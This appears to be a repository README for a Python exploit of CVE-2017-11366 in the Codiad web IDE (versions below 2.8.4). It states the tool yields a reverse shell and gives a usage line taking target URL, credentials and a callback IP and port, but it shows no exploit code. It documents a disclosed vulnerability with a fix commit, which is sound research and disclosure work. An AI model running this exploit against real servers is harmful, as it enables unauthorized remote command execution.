/Codiad-Remote-Code-Execute-Exploit

A simple exploit to execute system command on codiad

Primary LanguagePython

Codiad-Remote-Code-Execute-Exploit (CVE-2017-11366)

A simple exploit to execute system command on Codiad

Description :

This tool will exploit the vuln Codiad application to get a reverse shell

Effective Version :

< 2.8.4
Fix commit : https://github.com/Codiad/Codiad/commit/b3645b4c6718cef6de7003f41aafe7bfcc0395d1

Usage :

Usage : 
        python exploit.py [URL] [USERNAME] [PASSWORD] [IP] [PORT]
Example : 
        python exploit.py http://localhost/ admin admin 8.8.8.8 8888
Author : 
        WangYihang <wangyihanger@gmail.com>

Example_Via_Python Example_Via_Python

How it works :

[CVE-2017-11366]Codiad 漏洞挖掘笔记 (0x01) [环境搭建以及远程命令执行]